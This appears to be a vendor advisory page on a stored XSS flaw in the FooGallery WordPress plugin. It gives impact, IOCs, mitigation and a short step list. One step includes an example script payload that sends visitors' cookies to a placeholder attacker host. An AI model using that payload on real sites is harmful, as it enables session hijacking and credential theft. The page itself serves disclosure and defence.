CVE-2026-25362
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-25362 is a Stored Cross-Site Scripting (XSS) vulnerability in the FooPlugins FooGallery WordPress plugin. It affects all versions of FooGallery up to and including 3.1.11, and is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). The vulnerability was published on February 19, 2026, and carries a CVSS v3.1 base score of 5.9 (Medium) (Feedly).

Technical details

The vulnerability stems from insufficient input sanitization and output escaping within the FooGallery plugin, allowing authenticated attackers with high privileges (such as administrators) to inject malicious scripts into web pages (CWE-79). The stored XSS payload is persisted server-side and executed in the browsers of users who subsequently visit the affected page, with the scope of impact extending beyond the originating user session. Exploitation requires both high-privilege authentication and user interaction (a victim visiting the affected page), limiting the attack surface compared to unauthenticated XSS variants (Feedly).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers, potentially leading to session hijacking, credential theft, unauthorized actions performed on behalf of victims, and defacement of gallery content. Given the high-privilege requirement for injection, the primary risk scenario involves a compromised or malicious administrator account being used to target site visitors or lower-privileged users. Confidentiality, integrity, and availability impacts are all rated low, reflecting the limited but real risk of data exposure and content manipulation (Feedly).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.029%, indicating a very low probability of exploitation in the near term. Exploitation requires high privileges and user interaction, further reducing practical exploitability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Feedly).

Exploitation steps

  1. Authentication: Log in to the WordPress site with an account that has administrator-level privileges.
  2. Navigate to FooGallery: Access the FooGallery plugin settings or gallery management interface within the WordPress admin dashboard.
  3. Inject malicious payload: Insert a crafted JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable input field within the gallery configuration or metadata that is not properly sanitized.
  4. Save the payload: Submit or save the gallery settings, causing the malicious script to be stored in the WordPress database.
  5. Trigger execution: When a victim user (e.g., a site visitor or lower-privileged user) views the affected gallery page, the stored script executes in their browser, enabling session hijacking, cookie theft, or other client-side attacks (Feedly).

Indicators of compromise

  • Logs: WordPress admin audit logs showing unexpected gallery edits or settings changes by administrator accounts, particularly containing HTML or script tags in field values.
  • File System: Unexpected modifications to gallery-related database entries or plugin configuration files containing encoded JavaScript (<script>, javascript:, onerror=, etc.).
  • Network: Outbound requests from victim browsers to unknown external domains following visits to gallery pages, potentially indicating cookie or credential exfiltration.
  • Database: WordPress wp_posts or plugin-specific tables containing unsanitized HTML or JavaScript in gallery metadata fields.

Mitigation and workarounds

Users should update the FooGallery plugin to a version beyond 3.1.11 as soon as a patched release is made available by FooPlugins. In the interim, site administrators should restrict access to the WordPress admin dashboard to trusted users only and review existing gallery configurations for unexpected or suspicious content. Implementing a Web Application Firewall (WAF) with XSS filtering rules can provide additional defense-in-depth while awaiting an official patch (Feedly, Wordfence).

Community reactions

The vulnerability was noted in Wordfence's weekly WordPress vulnerability report for the period of February 9–15, 2026, as part of routine disclosure coverage (Wordfence). No significant independent researcher commentary or broader media coverage has been identified for this vulnerability.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-78361CRITICAL9.1
  • zipmoney-payments-woocommerce
NoYesSep 10, 2026
CVE-2026-82925HIGH8.1
  • site-reviews
NoYesSep 10, 2026
CVE-2026-77771HIGH7.5
  • miniorange-2-factor-authentication
NoYesSep 10, 2026
CVE-2026-81431HIGH7.2
  • registration-form-for-woocommerce
NoYesSep 10, 2026
CVE-2026-15889MEDIUM6.4
  • aruba-hispeed-cache
NoYesSep 10, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management